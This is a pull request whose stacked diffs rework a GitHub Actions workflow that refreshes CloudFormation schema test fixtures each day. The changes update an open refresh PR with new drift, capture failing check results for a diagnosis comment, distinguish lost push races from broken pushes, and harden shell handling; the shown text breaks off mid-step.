### PR TITLE
chore(schemas): make the refresh PR self-explanatory, and stop holding drift behind an open one

### DIFF
--- a/.github/refresh-pr-preamble.md
+++ b/.github/refresh-pr-preamble.md
@@ -1,0 +1,19 @@
+Automated daily refresh of `tests/fixtures/cfn-schemas/*.json` against AWS's
+public CloudFormation schema bundle.
+
+**This PR may be RED, and that is the hand-off.** The job runs only the
+mechanical chain (refresh, `gen:property-coverage`, backfill regeneration,
+`gen:all-matrices`, `format`) and touches nothing that encodes a judgement — no
+`unhandledByDesign`, no `bogusTolerated`, no `NESTED_KEY_ALLOW_LIST`, no
+provider code. The section below names what fired, where, and what the AWS SDK
+says about it.
+
+While this PR stays open, later runs push additional drift onto this branch
+rather than opening a second PR, and comment with the new diagnosis. Your
+classification commits are never overwritten: everything the job rewrites is
+derived and recomputed from the current sources.
+
+Types with no entry in the public bundle keep the authenticated `DescribeType`
+path as their only refresh route and are left untouched here.
+
+Runbook: https://github.com/go-to-k/cdkd/blob/main/docs/schema-refresh-runbook.md

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -255,6 +255,12 @@ jobs:
       - name: Diagnose what needs a decision
         if: steps.drift.outputs.drifted == 'true'
         run: |
+          set -euo pipefail
+          # The checker is EXPECTED to exit non-zero here — a divergence is the
+          # hand-off this whole step exists to describe. `set +e` spans only the
+          # invocation, so a later pipeline in this step cannot silently inherit
+          # a relaxed shell (which is exactly how `tee` swallowed the refresh's
+          # exit code one step up).
           set +e
           vp run audit:nested-key-coverage:check > /tmp/nested-key.log 2>&1
           set -e
@@ -295,7 +301,14 @@ jobs:
               echo "::warning::PR ${{ steps.open_pr.outputs.number }} is ${state}, not OPEN — it closed while this ran. Skipping; the next cycle recomputes."
               exit 0
             fi
-            before_sha=$(git ls-remote --heads origin "refs/heads/${existing_branch}" | awk 'NR==1{print $1}')
+            # The BASE this commit sits on — the tip fetched in the switch step,
+            # minutes ago. Reading the REMOTE here instead was the bug: a human
+            # pushing during the refresh moves the remote BEFORE this line, so
+            # the post-failure comparison found the tip unmoved and declared a
+            # real lost race "not a lost race", exiting 1. A non-fast-forward
+            # rejection means the remote left the base we committed on, so the
+            # base is what it must be compared against.
+            base_sha=$(git rev-parse HEAD)
             # ADDITIVE commit onto the open PR's branch. Never force: a
             # non-fast-forward here means a human pushed while this ran, and
             # overwriting that is the one outcome worth losing a cycle over.
@@ -313,11 +326,11 @@ jobs:
               # nothing, forever. The remote tip moving is what distinguishes
               # them.
               now=$(git ls-remote --heads origin "refs/heads/${existing_branch}" | awk 'NR==1{print $1}')
-              if [ -n "${now}" ] && [ "${now}" != "${before_sha}" ]; then
-                echo "::warning::Could not push to ${existing_branch} — a concurrent update won (tip moved ${before_sha} -> ${now}). The next run recomputes the same drift."
+              if [ -n "${now}" ] && [ "${now}" != "${base_sha}" ]; then
+                echo "::warning::Could not push to ${existing_branch} — a concurrent update won (tip is ${now}, this commit was built on ${base_sha}). The next run recomputes the same drift."
                 exit 0
               fi
-              echo "::error::Push to ${existing_branch} failed and the remote tip did not move — this is not a lost race."
+              echo "::error::Push to ${existing_branch} failed while the remote tip is still the base this commit was built on (${base_sha}) — a fast-forward was possible, so this is not a lost race."
               exit 1
             fi
           else

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -264,10 +264,21 @@ jobs:
             failed_checks="${failed_checks:+${failed_checks},}${name}"
             echo "::notice::${name} is red — a decision is needed on this PR"
           }
+          # The filter matches `property-coverage.test.ts` and its two siblings
+          # (`.runtime.test.ts`, `scripts/gen-property-coverage.test.ts`); all
+          # three are fixture-driven, and the guidance says to run the filter
+          # rather than naming one file, so a red in any of them lands somewhere
+          # a reader can act on.
           run_check property-coverage \
             env CDKD_GENERATE_BACKFILL=true vp test run property-coverage
           run_check audit:sdk-attr-coverage:check vp run audit:sdk-attr-coverage:check
           run_check audit:enrichment-coverage:check vp run audit:enrichment-coverage:check
+          # Unit tests that read the fixtures DIRECTLY and assert about their
+          # contents. They run under ci.yml's whole-suite job, not under any
+          # audit task, so a schema change reddens CI with nothing in the
+          # diagnosis to explain it.
+          run_check fixture-consumer-tests \
+            vp test run mutually-exclusive-properties ecs-deployment-configuration-subfield ecs-service-config-props
           # Through the environment FILE, not a shell variable: each `run:` is
           # its own shell, so a plain assignment here is simply gone by the
           # Diagnose step — and an absent `--failed-checks` reads as "nothing

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -263,11 +263,16 @@ jobs:
           # exit code one step up).
           set +e
           vp run audit:nested-key-coverage:check > /tmp/nested-key.log 2>&1
+          nested_key_rc=$?
           set -e
           # The skip list is the tail of the refresh log, after its own header.
           sed -n '/No entry in the public bundle/,$p' /tmp/refresh.log > /tmp/skipped.log || true
+          # The STATUS as well as the text: an empty log, a `task not found` and
+          # an OOM kill all carry no announcement to grep for, and all three
+          # rendered "additions only" over a checker that never ran.
           node scripts/diagnose-schema-refresh.mjs \
             --nested-key-log /tmp/nested-key.log \
+            --nested-key-rc "${nested_key_rc}" \
             --skipped-log /tmp/skipped.log > /tmp/diagnosis.md
 
       - name: Publish the refresh

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -183,7 +183,15 @@ jobs:
       # skip list from the file. Without this the "Not refreshed" section was
       # dead code — the flag existed and nothing ever passed it.
       - name: Refresh fixtures from the public schema bundle
-        run: vp run gen:cfn-schemas-from-zip 2>&1 | tee /tmp/refresh.log
+        run: |
+          # `set -o pipefail` is REQUIRED here, not decoration: a `run:` with no
+          # `shell:` is `bash -e {0}`, which does NOT set pipefail, so the `tee`
+          # added for the skip list would report ITS status and swallow the
+          # refresh's. The refresh exits 2 on capture failures, so a bundle
+          # fetch failure would have become "no drift" and a green run — the
+          # silent watch failure this whole job exists to prevent.
+          set -o pipefail
+          vp run gen:cfn-schemas-from-zip 2>&1 | tee /tmp/refresh.log
 
       # The change signal. `refresh-cfn-schemas.mjs --from-zip` writes ONLY
       # fixtures that actually drifted (`generatedAt` excluded from the
@@ -235,6 +243,27 @@ jobs:
           vp run gen:all-matrices
           vp run format
 
+      # Split from `Publish the refresh` so the step holding the write-scoped
+      # token runs neither the checker nor the diagnosis — the latter spawns
+      # `npm`, which inherits the environment. That is the same reasoning the
+      # checkout step gives for `persist-credentials: false`; leaving them in
+      # the token step would have widened exactly the surface that closed.
+      # Both only write /tmp, which survives across steps.
+      #
+      # Generated BEFORE the commit: the comparison against the COMMITTED
+      # fixtures is the whole source of "AWS removed this in THIS refresh".
+      - name: Diagnose what needs a decision
+        if: steps.drift.outputs.drifted == 'true'
+        run: |
+          set +e
+          vp run audit:nested-key-coverage:check > /tmp/nested-key.log 2>&1
+          set -e
+          # The skip list is the tail of the refresh log, after its own header.
+          sed -n '/No entry in the public bundle/,$p' /tmp/refresh.log > /tmp/skipped.log || true
+          node scripts/diagnose-schema-refresh.mjs \
+            --nested-key-log /tmp/nested-key.log \
+            --skipped-log /tmp/skipped.log > /tmp/diagnosis.md
+
       - name: Publish the refresh
         id: publish
         if: steps.drift.outputs.drifted == 'true'
@@ -248,19 +277,6 @@ jobs:
           set -euo pipefail
           git config user.name "github-actions[bot]"
           git config user.email "41898282+github-actions[bot]@users.noreply.github.com"
-
-          # The diagnosis is generated BEFORE committing, while the committed
-          # fixtures are still the PREVIOUS ones — that comparison is the whole
-          # source of "AWS removed this in THIS refresh".
-          set +e
-          vp run audit:nested-key-coverage:check > /tmp/nested-key.log 2>&1
-          set -e
-          # The skip list is the tail of the refresh log, after its own header.
-          sed -n '/No entry in the public bundle/,$p' /tmp/refresh.log > /tmp/skipped.log || true
-          node scripts/diagnose-schema-refresh.mjs \
-            --nested-key-log /tmp/nested-key.log \
-            --skipped-log /tmp/skipped.log > /tmp/diagnosis.md
-
           git add \
             tests/fixtures/cfn-schemas/ \
             src/provisioning/ \
@@ -279,6 +295,7 @@ jobs:
               echo "::warning::PR ${{ steps.open_pr.outputs.number }} is ${state}, not OPEN — it closed while this ran. Skipping; the next cycle recomputes."
               exit 0
             fi
+            before_sha=$(git ls-remote --heads origin "refs/heads/${existing_branch}" | awk 'NR==1{print $1}')
             # ADDITIVE commit onto the open PR's branch. Never force: a
             # non-fast-forward here means a human pushed while this ran, and
             # overwriting that is the one outcome worth losing a cycle over.
@@ -290,8 +307,18 @@ jobs:
                 --body-file /tmp/diagnosis.md
               pr_number="${{ steps.open_pr.outputs.number }}"
             else
-              echo "::warning::Could not push to ${existing_branch} — a concurrent update won. Skipping this cycle; the next run recomputes the same drift."
-              exit 0
+              # A lost RACE and a broken push are different outcomes and must
+              # not share one green exit: a permission or branch-protection
+              # failure would otherwise give a green daily job that lands
+              # nothing, forever. The remote tip moving is what distinguishes
+              # them.
+              now=$(git ls-remote --heads origin "refs/heads/${existing_branch}" | awk 'NR==1{print $1}')
+              if [ -n "${now}" ] && [ "${now}" != "${before_sha}" ]; then
+                echo "::warning::Could not push to ${existing_branch} — a concurrent update won (tip moved ${before_sha} -> ${now}). The next run recomputes the same drift."
+                exit 0
+              fi
+              echo "::error::Push to ${existing_branch} failed and the remote tip did not move — this is not a lost race."
+              exit 1
             fi
           else
             cycle=$(date -u +%Y-%m-%d)
@@ -339,7 +366,9 @@ jobs:
               sed -n '/^### Writable properties AWS added/,/^###\|^_/p' /tmp/diagnosis.md \
                 | grep '^- ' || true
               echo
-              echo "Carried by https://github.com/${GITHUB_REPOSITORY}/pull/${pr_number}"
+              if [ -n "${pr_number:-}" ]; then
+                echo "Carried by https://github.com/${GITHUB_REPOSITORY}/pull/${pr_number}"
+              fi
             } > /tmp/umbrella.md
             gh issue comment "${BACKFILL_UMBRELLA}" --body-file /tmp/umbrella.md \
               || echo "::warning::Could not comment on the backfill umbrella issue; the list is in the PR body."

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -85,6 +85,13 @@ jobs:
     permissions:
       contents: write
       pull-requests: write
+      # `issues: write` is REQUIRED, not tidiness: the umbrella fold calls
+      # `gh issue comment`, and `pull-requests: write` covers PR comments only.
+      # Without it every cycle 403s, the `|| echo "::warning::"` on that call
+      # swallows it, the job goes GREEN and the umbrella is never updated — the
+      # silent-failure class this whole job exists to remove, in the one step
+      # the runbook promises will happen automatically.
+      issues: write
     steps:
       - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
         with:
@@ -172,9 +179,13 @@ jobs:
         if: steps.open_pr.outputs.number != ''
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          # Through `env:`, not `${{ }}` inside the shell body. The value is a
+          # jq-extracted JSON integer, so it is contained today — this removes
+          # the CLASS rather than a live bug, and costs one line.
+          PR_NUMBER: ${{ steps.open_pr.outputs.number }}
         run: |
           set -euo pipefail
-          branch=$(gh pr view "${{ steps.open_pr.outputs.number }}" --json headRefName --jq .headRefName)
+          branch=$(gh pr view "${PR_NUMBER}" --json headRefName --jq .headRefName)
           echo "existing_branch=${branch}" >> "$GITHUB_ENV"
           git fetch origin "${branch}"
           git checkout "${branch}"
@@ -351,6 +362,8 @@ jobs:
           # wired into an SDK provider. Named here rather than in the script so
           # moving the campaign is a workflow edit, not a code change.
           BACKFILL_UMBRELLA: "609"
+          # Same reasoning as the switch step: no `${{ }}` inside a shell body.
+          PR_NUMBER: ${{ steps.open_pr.outputs.number }}
         run: |
           set -euo pipefail
           git config user.name "github-actions[bot]"
@@ -368,9 +381,9 @@ jobs:
             # PR, which this repo has a whole hook class about — and leave a
             # diagnosis comment on an already-merged PR. Nothing is lost by
             # bailing: the next cycle recomputes the same drift against main.
-            state=$(gh pr view "${{ steps.open_pr.outputs.number }}" --json state --jq .state)
+            state=$(gh pr view "${PR_NUMBER}" --json state --jq .state)
             if [ "${state}" != "OPEN" ]; then
-              echo "::warning::PR ${{ steps.open_pr.outputs.number }} is ${state}, not OPEN — it closed while this ran. Skipping; the next cycle recomputes."
+              echo "::warning::PR ${PR_NUMBER} is ${state}, not OPEN — it closed while this ran. Skipping; the next cycle recomputes."
               exit 0
             fi
             # The BASE this commit sits on — the tip fetched in the switch step,
@@ -388,9 +401,9 @@ jobs:
             if git push \
                  "https://x-access-token:${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}.git" \
                  "${existing_branch}"; then
-              gh pr comment "${{ steps.open_pr.outputs.number }}" \
+              gh pr comment "${PR_NUMBER}" \
                 --body-file /tmp/diagnosis.md
-              pr_number="${{ steps.open_pr.outputs.number }}"
+              pr_number="${PR_NUMBER}"
             else
               # A lost RACE and a broken push are different outcomes and must
               # not share one green exit: a permission or branch-protection

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -245,17 +245,34 @@ jobs:
           # "no decision needed". Its red is reached by an ordinary schema
           # ADDITION (AWS re-adding a property a provider wrote off), which is
           # what makes the silence expensive.
-          if CDKD_GENERATE_BACKFILL=true vp test run property-coverage; then
-            property_coverage_rc=0
-          else
-            property_coverage_rc=$?
-            echo "::notice::property-coverage is red — classification is needed on this PR"
-          fi
+          # EVERY fixture-driven CI check runs here, and every red is COLLECTED
+          # rather than tolerated. Each of these reads
+          # `tests/fixtures/cfn-schemas/` and hard-fails CI, and two of the
+          # three are reddened by a pure schema ADDITION — the shape a reader is
+          # most likely to wave through. `property-coverage`'s status was
+          # discarded for six review rounds and its red rendered as "nothing
+          # needs a decision"; the other two were found the round after.
+          #
+          # Adding a fourth is a line here and a `CHECK_GUIDANCE` row in
+          # scripts/diagnose-schema-refresh.mjs. The list is fenced against that
+          # table by tests/unit/scripts/cfn-schema-refresh-workflow.test.ts.
+          failed_checks=""
+          run_check() {
+            name="$1"
+            shift
+            if "$@"; then return 0; fi
+            failed_checks="${failed_checks:+${failed_checks},}${name}"
+            echo "::notice::${name} is red — a decision is needed on this PR"
+          }
+          run_check property-coverage \
+            env CDKD_GENERATE_BACKFILL=true vp test run property-coverage
+          run_check audit:sdk-attr-coverage:check vp run audit:sdk-attr-coverage:check
+          run_check audit:enrichment-coverage:check vp run audit:enrichment-coverage:check
           # Through the environment FILE, not a shell variable: each `run:` is
           # its own shell, so a plain assignment here is simply gone by the
-          # Diagnose step — and `readNumArg`'s absent-flag arm defaults to 0,
-          # so losing it would have restored the exact silence this fixes.
-          echo "PROPERTY_COVERAGE_RC=${property_coverage_rc}" >> "${GITHUB_ENV}"
+          # Diagnose step — and an absent `--failed-checks` reads as "nothing
+          # failed", so losing it would restore the exact silence this fixes.
+          echo "FAILED_CHECKS=${failed_checks}" >> "${GITHUB_ENV}"
           vp run gen:all-matrices
           vp run format
 
@@ -289,7 +306,7 @@ jobs:
           node scripts/diagnose-schema-refresh.mjs \
             --nested-key-log /tmp/nested-key.log \
             --nested-key-rc "${nested_key_rc}" \
-            --property-coverage-rc "${PROPERTY_COVERAGE_RC}" \
+            --failed-checks "${FAILED_CHECKS}" \
             --skipped-log /tmp/skipped.log > /tmp/diagnosis.md
 
       - name: Publish the refresh

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -238,8 +238,24 @@ jobs:
           # exempt — that failure IS the designed hand-off.
           set -euo pipefail
           vp run gen:property-coverage
-          CDKD_GENERATE_BACKFILL=true vp test run property-coverage || \
+          # The status is CAPTURED, not merely tolerated. `|| echo` already stops
+          # `set -e` aborting, and for six rounds that was all it did — the red
+          # never reached the diagnosis, so a failing coverage check rendered as
+          # "nothing needs a decision" and the offending property was listed as
+          # "no decision needed". Its red is reached by an ordinary schema
+          # ADDITION (AWS re-adding a property a provider wrote off), which is
+          # what makes the silence expensive.
+          if CDKD_GENERATE_BACKFILL=true vp test run property-coverage; then
+            property_coverage_rc=0
+          else
+            property_coverage_rc=$?
             echo "::notice::property-coverage is red — classification is needed on this PR"
+          fi
+          # Through the environment FILE, not a shell variable: each `run:` is
+          # its own shell, so a plain assignment here is simply gone by the
+          # Diagnose step — and `readNumArg`'s absent-flag arm defaults to 0,
+          # so losing it would have restored the exact silence this fixes.
+          echo "PROPERTY_COVERAGE_RC=${property_coverage_rc}" >> "${GITHUB_ENV}"
           vp run gen:all-matrices
           vp run format
 
@@ -273,6 +289,7 @@ jobs:
           node scripts/diagnose-schema-refresh.mjs \
             --nested-key-log /tmp/nested-key.log \
             --nested-key-rc "${nested_key_rc}" \
+            --property-coverage-rc "${PROPERTY_COVERAGE_RC}" \
             --skipped-log /tmp/skipped.log > /tmp/diagnosis.md
 
       - name: Publish the refresh

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -279,16 +279,28 @@ jobs:
           # contents. They run under ci.yml's whole-suite job, not under any
           # audit task, so a schema change reddens CI with nothing in the
           # diagnosis to explain it.
-          # `props.test`, covering a FAMILY: five suites carry the same
-          # zero-headroom assertion (`silentDrop` must be empty), so naming one
-          # of them covered three files of five, and one writable property added
-          # to any of six types would have redded CI with nothing in the
-          # diagnosis. Not `-props` — vitest parses a leading dash as a FLAG and
-          # the step dies with `Unknown option \`-p\``. The filter set is fenced
-          # against the real family, and against that shape, by
-          # tests/unit/scripts/cfn-schema-refresh-workflow.test.ts.
+          # Every member of the zero-headroom FAMILY, named. Five suites assert
+          # `silentDrop` is empty against the real coverage, so one writable
+          # property AWS adds to any of their types reds CI while
+          # `property-coverage` absorbs the same addition and stays green —
+          # naming one of them covered 1 of the 5.
+          #
+          # Named rather than matched by `props.test`, which also selects four
+          # unrelated suites and would attribute their red to a schema decision
+          # that does not exist. Naming is only safe because the fence in
+          # tests/unit/scripts/cfn-schema-refresh-workflow.test.ts DERIVES the
+          # family and fails when a sixth appears. Not `-props` either: vitest
+          # parses a leading dash as a FLAG and the step dies with
+          # `Unknown option \`-p\``.
           run_check fixture-consumer-tests \
-            vp test run mutually-exclusive-properties ecs-deployment-configuration-subfield props.test
+            vp test run \
+              mutually-exclusive-properties \
+              ecs-deployment-configuration-subfield \
+              apigatewayv2-integration-props \
+              apigatewayv2-stage-route-props \
+              appsync-graphqlapi-config-props \
+              appsync-resolver-datasource-props \
+              ecs-service-config-props
           # Through the environment FILE, not a shell variable: each `run:` is
           # its own shell, so a plain assignment here is simply gone by the
           # Diagnose step — and an absent `--failed-checks` reads as "nothing

--- a/.github/workflows/cfn-schema-refresh.yml
+++ b/.github/workflows/cfn-schema-refresh.yml
@@ -106,13 +106,24 @@ jobs:
 
       - run: vp install --frozen-lockfile
 
-      # At most ONE open refresh PR at a time. When a previous cycle's PR is
-      # still open, this cycle stops after commenting rather than pushing to
-      # that branch: a human is expected to commit CLASSIFICATIONS onto it
-      # (bogus rationales, `unhandledByDesign` entries, allow-list entries), and
-      # a bot push would race or destroy that work. Skipping loses nothing —
-      # drift is always computed against the COMMITTED fixtures, so it is
-      # cumulative and the next run after the merge picks up both cycles.
+      # At most ONE open refresh PR at a time — and when one is open the cycle
+      # UPDATES it rather than skipping.
+      #
+      # It skipped at first, on the reasoning that a human commits
+      # CLASSIFICATIONS onto that branch and a bot push would destroy them.
+      # That generalised "force-push destroys" into "push destroys", and the
+      # artifacts say otherwise: the human's work lives in provider sources and
+      # in `NESTED_KEY_ALLOW_LIST` (never touched here) and in
+      # `_todo-backfill.json`'s `bogusTolerated` block, which the generator
+      # explicitly PRESERVES across regeneration. Everything this job rewrites
+      # is DERIVED and is recomputed from the current sources, so an additive
+      # push reflects the human's classification rather than undoing it.
+      #
+      # Skipping was also the costlier answer where it mattered most: a RED PR
+      # is the one that stays open for days, and that is exactly the window in
+      # which every new AWS addition would have been held back — with no user
+      # workaround, since a warned-about property still does not reach AWS
+      # until its fixture lands.
       - name: Look for an open refresh PR
         id: open_pr
         env:
@@ -154,9 +165,25 @@ jobs:
             echo "An open refresh PR already exists: ${number}"
           fi
 
+      # Land on the open PR's branch when there is one, so the refresh below
+      # computes drift against ITS fixtures — i.e. only what AWS has changed
+      # SINCE that PR, not the drift it already carries.
+      - name: Switch to the open refresh PR's branch
+        if: steps.open_pr.outputs.number != ''
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          set -euo pipefail
+          branch=$(gh pr view "${{ steps.open_pr.outputs.number }}" --json headRefName --jq .headRefName)
+          echo "existing_branch=${branch}" >> "$GITHUB_ENV"
+          git fetch origin "${branch}"
+          git checkout "${branch}"
+
+      # Output is teed: the run log stays readable, and the diagnosis reads the
+      # skip list from the file. Without this the "Not refreshed" section was
+      # dead code — the flag existed and nothing ever passed it.
       - name: Refresh fixtures from the public schema bundle
-        if: steps.open_pr.outputs.number == ''
-        run: vp run gen:cfn-schemas-from-zip
+        run: vp run gen:cfn-schemas-from-zip 2>&1 | tee /tmp/refresh.log
 
       # The change signal. `refresh-cfn-schemas.mjs --from-zip` writes ONLY
       # fixtures that actually drifted (`generatedAt` excluded from the
@@ -166,7 +193,6 @@ jobs:
       # alone, i.e. the job would open a no-op PR every month.
       - name: Detect drift
         id: drift
-        if: steps.open_pr.outputs.number == ''
         run: |
           set -euo pipefail
           # `git status --porcelain`, not `git diff --quiet`: the latter is
@@ -209,125 +235,112 @@ jobs:
           vp run gen:all-matrices
           vp run format
 
-      - name: Open the refresh PR
+      - name: Publish the refresh
+        id: publish
         if: steps.drift.outputs.drifted == 'true'
         env:
           GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+          # The standing umbrella issue that collects properties still to be
+          # wired into an SDK provider. Named here rather than in the script so
+          # moving the campaign is a workflow edit, not a code change.
+          BACKFILL_UMBRELLA: "609"
         run: |
           set -euo pipefail
-          # DAY granularity, not month: the branch name is the cycle's identity,
-          # and at a daily cadence a month-granular name would make every run
-          # after the first in a month collide with an existing branch.
-          cycle=$(date -u +%Y-%m-%d)
-          branch="bot/cfn-schema-refresh/${cycle}"
-          # A same-day re-dispatch after the previous cycle's PR was closed
-          # WITHOUT deleting its branch would otherwise die on a non-fast-forward
-          # push. The branch is bot-owned and its PR is gone, so replacing it is
-          # correct; `--force-with-lease` still refuses if it moved under us.
-          #
-          # The EXPLICIT `<ref>:<sha>` form is required, not a style choice. A
-          # bare `--force-with-lease` compares against a REMOTE-TRACKING ref,
-          # and there is none here: checkout fetches only the triggering ref at
-          # depth 1, and the push target is an anonymous URL with no fetch
-          # refspec. Git then expects the ref NOT to exist — while `force` is
-          # set only on the path where `ls-remote` just proved it does — so the
-          # push is rejected `(stale info)` every time, i.e. the recovery path
-          # would fail in exactly the case it exists for.
-          force=""
-          # `refs/heads/${branch}` (fully qualified) and `NR==1`: the bare name
-          # is a PATTERN that also matches `refs/heads/<anything>/${branch}`,
-          # and two matching lines would make `existing_sha` two shas, which
-          # word-splits `${force}` into a bogus extra refspec. `awk` rather
-          # than `head -n1`, which would SIGPIPE under `pipefail`.
-          existing_sha=$(git ls-remote --heads origin "refs/heads/${branch}" | awk 'NR==1{print $1}')
-          if [ -n "${existing_sha}" ]; then
-            echo "Branch ${branch} already exists remotely at ${existing_sha} — replacing it (its PR is not open)."
-            force="--force-with-lease=refs/heads/${branch}:${existing_sha}"
-          fi
           git config user.name "github-actions[bot]"
           git config user.email "41898282+github-actions[bot]@users.noreply.github.com"
-          git checkout -b "${branch}"
-          # Scoped to what the regeneration chain writes, not `git add -A`: a
-          # generator that starts dropping a scratch file would otherwise have
-          # it committed by a bot nobody is watching at the time.
+
+          # The diagnosis is generated BEFORE committing, while the committed
+          # fixtures are still the PREVIOUS ones — that comparison is the whole
+          # source of "AWS removed this in THIS refresh".
+          set +e
+          vp run audit:nested-key-coverage:check > /tmp/nested-key.log 2>&1
+          set -e
+          # The skip list is the tail of the refresh log, after its own header.
+          sed -n '/No entry in the public bundle/,$p' /tmp/refresh.log > /tmp/skipped.log || true
+          node scripts/diagnose-schema-refresh.mjs \
+            --nested-key-log /tmp/nested-key.log \
+            --skipped-log /tmp/skipped.log > /tmp/diagnosis.md
+
           git add \
             tests/fixtures/cfn-schemas/ \
             src/provisioning/ \
             docs/
           git status --porcelain
-          # `chore(...)` on purpose: release-please's conventional-commit rules
-          # give it no changelog section, so this never opens or advances the
-          # standing release PR. Same reasoning as .github/dependabot.yml.
-          git commit -m "chore(schemas): refresh CFn schema fixtures (${cycle})"
-          # Explicit token: `persist-credentials: false` above means the remote
-          # carries no auth, so this is the ONE step that holds it — rather
-          # than every step in the job.
-          git push ${force} \
-            "https://x-access-token:${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}.git" \
-            "${branch}"
-          {
-            echo "Automated daily refresh of \`tests/fixtures/cfn-schemas/*.json\` against"
-            echo "AWS's public CloudFormation schema bundle."
-            echo
-            echo "**This PR may be RED, and that is the hand-off.** The job runs only the"
-            echo "mechanical chain (refresh, \`gen:property-coverage\`, backfill regeneration,"
-            echo "\`gen:all-matrices\`, \`format\`). Two classes need a human and cannot be"
-            echo "regenerated:"
-            echo
-            echo "1. A **removed or renamed** property turns a provider's \`handledProperties\` /"
-            echo "   \`unhandledByDesign\` declaration into a bogus entry. Retire the declaration,"
-            echo "   or add a \`bogusTolerated\` rationale."
-            echo "2. \`audit:nested-key-coverage:check\` reports **divergences**, not staleness."
-            echo "   A new nested key on a \`NESTED_KEY_TARGETS\` type needs a provider fix or a"
-            echo "   \`NESTED_KEY_ALLOW_LIST\` entry with a rationale."
-            echo
-            echo "Newly unaccounted WRITABLE properties are listed in"
-            echo "\`tests/fixtures/cfn-schemas/_todo-backfill.json\`; fold them into the standing"
-            echo "backfill umbrella (https://github.com/go-to-k/cdkd/issues/609) rather than"
-            echo "filing one issue each."
-            echo
-            echo "Types with no entry in the public bundle keep the authenticated"
-            echo "\`DescribeType\` path as their only refresh route and are left untouched here."
-            echo
-            echo "Mechanism: https://github.com/go-to-k/cdkd/issues/2718"
-          } > /tmp/pr-body.md
-          gh pr create \
-            --title "chore(schemas): refresh CFn schema fixtures (${cycle})" \
-            --body-file /tmp/pr-body.md \
-            --head "${branch}" \
-            --base main
 
-      - name: Note the skipped cycle on the open PR
-        if: steps.open_pr.outputs.number != ''
-        env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
-        run: |
-          set -euo pipefail
-          # ONCE per PR, not once per cycle. At a daily cadence an unattended
-          # comment would otherwise land every day the PR stays open — a PR
-          # left for a month would collect thirty identical notes, which is
-          # the kind of noise that trains a reader to ignore the thread. The
-          # message says nothing new on repeat: drift is cumulative either way.
-          marker="<!-- cdkd-schema-refresh-skip-note -->"
-          # Captured into a variable, NOT piped into `grep -qF`. `grep -q`
-          # exits on the first match and closes the pipe, so under `pipefail`
-          # the producer's SIGPIPE (141) becomes the pipeline's status and the
-          # `if` takes the ELSE branch even though the marker WAS found —
-          # posting a duplicate. Measured: at 1 KB of comments the producer
-          # exits 0 and the guard works; at 60 KB (over the pipe buffer) it
-          # exits 141 and the guard inverts, i.e. it fails exactly on the
-          # long-lived thread this guard exists for. Same class as the `awk`
-          # note further down; this file has learned it twice now.
-          #
-          # A `gh` failure now aborts the step under `set -e` rather than
-          # reading as "not yet commented" — and even the pagination case
-          # errs toward a duplicate note, never toward silence.
-          comments=$(gh pr view "${{ steps.open_pr.outputs.number }}" --json comments \
-            --jq '.comments[].body')
-          if grep -qF "${marker}" <<<"${comments}"; then
-            echo "Skip note already present on PR ${{ steps.open_pr.outputs.number }} — not repeating it."
-            exit 0
+          if [ -n "${existing_branch:-}" ]; then
+            # Re-check the PR is STILL open. A squash merge with
+            # `--delete-branch` between the guard and here would make the plain
+            # push below CREATE the deleted branch again — an orphan ref with no
+            # PR, which this repo has a whole hook class about — and leave a
+            # diagnosis comment on an already-merged PR. Nothing is lost by
+            # bailing: the next cycle recomputes the same drift against main.
+            state=$(gh pr view "${{ steps.open_pr.outputs.number }}" --json state --jq .state)
+            if [ "${state}" != "OPEN" ]; then
+              echo "::warning::PR ${{ steps.open_pr.outputs.number }} is ${state}, not OPEN — it closed while this ran. Skipping; the next cycle recomputes."
+              exit 0
+            fi
+            # ADDITIVE commit onto the open PR's branch. Never force: a
+            # non-fast-forward here means a human pushed while this ran, and
+            # overwriting that is the one outcome worth losing a cycle over.
+            git commit -m "chore(schemas): additional CFn schema drift ($(date -u +%Y-%m-%d))"
+            if git push \
+                 "https://x-access-token:${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}.git" \
+                 "${existing_branch}"; then
+              gh pr comment "${{ steps.open_pr.outputs.number }}" \
+                --body-file /tmp/diagnosis.md
+              pr_number="${{ steps.open_pr.outputs.number }}"
+            else
+              echo "::warning::Could not push to ${existing_branch} — a concurrent update won. Skipping this cycle; the next run recomputes the same drift."
+              exit 0
+            fi
+          else
+            cycle=$(date -u +%Y-%m-%d)
+            branch="bot/cfn-schema-refresh/${cycle}"
+            # Explicit `--force-with-lease=<ref>:<sha>` when the branch already
+            # exists (a same-day re-dispatch whose PR was closed, not merged).
+            # The bare form compares against a remote-TRACKING ref that does not
+            # exist here, so git expects the branch to be ABSENT and rejects
+            # exactly the case this handles.
+            force=""
+            existing_sha=$(git ls-remote --heads origin "refs/heads/${branch}" | awk 'NR==1{print $1}')
+            if [ -n "${existing_sha}" ]; then
+              force="--force-with-lease=refs/heads/${branch}:${existing_sha}"
+            fi
+            git checkout -b "${branch}"
+            # `chore(...)` on purpose: release-please gives it no changelog
+            # section, so this never opens or advances the standing release PR.
+            git commit -m "chore(schemas): refresh CFn schema fixtures (${cycle})"
+            git push ${force} \
+              "https://x-access-token:${GH_TOKEN}@github.com/${GITHUB_REPOSITORY}.git" \
+              "${branch}"
+            {
+              cat .github/refresh-pr-preamble.md
+              echo
+              cat /tmp/diagnosis.md
+            } > /tmp/pr-body.md
